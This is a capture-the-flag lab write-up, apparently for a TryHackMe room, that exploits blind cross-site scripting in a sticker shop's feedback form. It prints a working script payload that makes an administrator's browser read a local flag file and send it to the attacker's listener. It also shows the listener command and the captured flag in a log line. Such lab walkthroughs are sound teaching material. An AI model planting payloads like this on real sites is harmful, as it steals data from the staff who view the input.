The Sticker Shop
Introduction
A local sticker shop has recently launched its own webpage. Due to limited experience in web development, they have opted to develop and host the website on the same computer they use for everyday tasks such as browsing the internet and reading customer feedback. This setup introduces significant security risks, making it a viable target for ethical security assessment.
Our goal is to determine whether we can read the flag stored at http://10.10.151.58:8080/flag.txt.
Initial Observations
Attempting to access http://10.10.151.58:8080/flag.txt directly results in a 401 Unauthorized error, indicating that authentication is required. This suggests that the file is protected from direct access by unauthorized users.
Examining other available endpoints, we discover a feedback submission page at http://10.10.151.58:8080/submit_feedback. This page contains a form where users can submit feedback, and upon submission, a message appears:
"Thanks for your feedback! It will be evaluated shortly by our staff."
This message suggests that user-submitted feedback may be reviewed by an administrator, which opens the possibility for a stored or blind cross-site scripting (XSS) attack.
Exploiting Blind XSS
Blind XSS occurs when user input is stored on a server and later executed when accessed by another user, typically an administrator. Since the feedback is being "evaluated shortly by our staff," it is possible that an administrator views it in a browser, potentially executing any embedded JavaScript.
Attack Strategy
Our approach involves crafting a JavaScript payload that:
- Fetches the contents of
/flag.txtin localhost. - Sends the retrieved data to our controlled server.
python3 -m http.server 80
<script>
fetch('http://127.0.0.1:8080/flag.txt')
.then(response => response.text())
.then(data => {
fetch('http://10.2.17.44/?data=' + decodeURIComponent(data))
})
</script>
10.10.188.220 - - [04/Feb/2025 15:09:45] "GET /?data=THM{83789a69074f-B0end-8b62305ee6} HTTP/1.1" 200 -